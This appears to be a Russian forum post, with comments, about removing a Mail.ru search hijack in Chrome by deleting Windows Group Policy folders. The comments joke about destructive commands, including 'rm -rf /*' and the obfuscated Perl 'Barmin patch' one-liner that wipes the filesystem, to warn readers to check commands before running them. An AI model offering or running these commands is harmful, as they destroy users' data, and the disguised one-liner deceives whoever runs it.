3403

Mail.ru поиск

Добавляю сей пост скорее для себя в качестве заметки. Но и вам тоже может пригодиться. Подцепил внезапно весь букет от Mail.ru. Все удалил при помощи Uninstall Tool, почистил мусор в реестре, в хроме убрал все лишнее. Но вот поисковик никак не имел возможности изменить, выдавало, что "Этот параметр включен Администратором" и все, остальные поисковики неактивны. В гугле нашел очень простой и быстрый способ исправить это:

Из командной строки поэтапно вводим следующие комманды:

1 - RD /S /Q "%WinDir%/System32/GroupPolicyUsers"

2 - RD /S /Q "%WinDir%/System32/GroupPolicy"

3 - gpupdate /force
Вы смотрите срез комментариев. Показать все
8
Автор поста оценил этот комментарий

Я так однажды свой линух починил с помощью sudo rm -rf. Когда я спросил на форуме, куда делись все файлы, мне посоветовали попробовать еще echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' сверху выполнить...

раскрыть ветку (13)
6
Это какой-то профессиональный юмор, да?
раскрыть ветку (12)
8

Это патч Бармина, друг мой. Если не проверять команды перед выполненем, можно запросто и втайне от себя отформатировать жесткий диск...

раскрыть ветку (7)
6
Ну, вот что вы за человек то такой, а? Я после ночной смены, очень хочу спать, но мне же теперь нужно искать в Гугле, что такое патч Бармина...
раскрыть ветку (6)
5

Ну я как бы намекнул, что этот патч "форматирует" ЖД.

раскрыть ветку (5)
3

А он не форматирует. Очистка ФС от файлов и пересоздание журнала и дерева i-нод - маленько разные вещи.

Но советовать mkfs.ext4 /dev/sda1 бессмысленно, т.к раздел смонтирован. Так что rm -rf /* гораздо более, так сказать, эффективен. 

1
Да я нашёл уже:) Спасибо, классная шутка:)
раскрыть ветку (3)
0

А можно еще узнать как реестр чистить? Было-бы полезно.

раскрыть ветку (2)
0
DELETED
Комментарий удален. Причина: данный аккаунт был удалён
раскрыть ветку (1)
1

.exe можно не дописывать, если не ошибаюсь

Шуточка для умственно отсталых про удаление системы двумя способами(первый написан с ошибкой). Юмор на уровне Петросяна.
раскрыть ветку (3)
2
Это не юмор, а правда жизни. Откуда ты знаешь, что делает та или иная команда, которую тебе посоветовали выполнить на форуме? А если этих команд несколько?

перваый написан с ошибкой

Первый не выполнится на современных убунтах даже будучи написанным без ошибки, но сути дела это не меняет. Да, там действительно пропущен слэш, умник.

раскрыть ветку (2)
1
В первом у тебя даже не указано, что удалять. И все прекрасно работает, сам проверял. Хз что там с убунтой, но Гента самоуничтожается без проблем. Так что действительно стоит проверять чего пишешь, как ты и советовал.
0
И ещё, кстати. Рм (с ключом рф) очень даже удобен для удаления чего-либо через консольку, совсем не обязательно это должна быть вся система.
Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку